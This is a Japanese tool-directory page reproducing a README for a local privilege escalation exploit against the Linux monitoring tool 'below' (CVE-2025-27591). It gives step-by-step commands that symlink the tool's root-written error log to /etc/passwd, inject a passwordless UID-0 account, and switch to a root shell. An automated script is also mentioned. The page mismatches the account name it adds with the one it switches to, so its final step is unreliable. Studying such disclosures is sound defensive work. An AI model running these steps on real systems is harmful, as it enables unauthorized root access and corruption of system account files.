Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/dollarboysushil/linux-privilege-escalation-cve-2025-27591
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミング
GitHubdollarboysushil/linux-privilege-escalation-cve-2025-27591

Linux-Privilege-Escalation-CVE-2025-27591

CVE-2025-27591は、Belowサービス(バージョン < v0.9.0)における既知の特権昇格脆弱性です。

リポジトリを見る
72111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-27591 - belowにおける書き込み可能なシンボリックリンクを介した権限昇格

概要

これは CVE-2025-27591 に対するシンプルなエクスプロイトであり、Linux システム監視ツール below におけるローカル権限昇格脆弱性です。この脆弱性は v0.9.0 より前のバージョンに影響し、システム内の誤った権限割り当てに起因します。この問題は 2025 年 1 月に発見され、2025 年 3 月 12 日に公開されました (SecurityOnline, OpenWall)。below が sudo で実行されると、ワールド書き込み可能なディレクトリ (/var/log/below) にエラーログを書き込む可能性があり、攻撃者はログファイルを /etc/passwd などの機密ターゲットへのシンボリックリンクとして作成できます。

これを悪用することで、below への sudo アクセスを持つ非特権ユーザーが root に権限昇格できます。


脆弱性の詳細

  • CVE ID: CVE-2025-27591
  • 脆弱なツール: below
  • 影響を受ける機能: below record によるログ記録
  • 脆弱なパス: /var/log/below/error_root.log
  • 攻撃の前提条件:
    • ディレクトリ /var/log/below がワールド書き込み可能であること
    • 攻撃者がパスワードなしで sudo /usr/bin/below record を実行できること

エクスプロイトの手順 (手動)

✅ 手順 1: ワールド書き込み可能なログディレクトリを確認する 以下のように表示されるはずです:

drwxrwxrwx 2 root root 4096 ... /var/log/below

alt text

✅ 手順 2: 既存の error_root.log を削除する

rm -f /var/log/below/error_root.log

✅ 手順 3: /etc/passwd へのシンボリックリンクを作成する

ln -s /etc/passwd /var/log/below/error_root.log

その後、以下で確認:

ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

alt text

✅ 手順 4: ペイロードファイルを作成する これにより、パスワードなしの新しい root ユーザー attacker が追加されます:

echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload

ファイル構造

username:password:UID:GID:comment(home/full name):home_directory:shell

ここで重要なのは、UID と GUID です。UID と GUID を 0 に設定することで、ユーザーを root ユーザーにし、グループ ID を root グループにします。 alt text

✅ 手順 5: root としてログ書き込みをトリガーする これがエクスプロイトの中核です。

sudo /usr/bin/below record

このコマンドは失敗またはタイムアウトすることが予想されますが、/var/log/below/error_root.log (実際には /etc/passwd) にエラーログを書き込もうとします。 💡 場合によっては、これだけで /etc/passwd が破損する可能性があります。そのため、次に完全に上書きします。

✅ 手順 6: シンボリックリンクを介して /etc/passwd を上書きする

cp /tmp/payload /var/log/below/error_root.log

alt text

✅ 手順 7: root になる

su attacker

パスワードなしで root シェルに移行します。 alt text

エクスプロイトの手順 (自動)

python3 dbs_exploit.py

alt text

ツールをダウンロード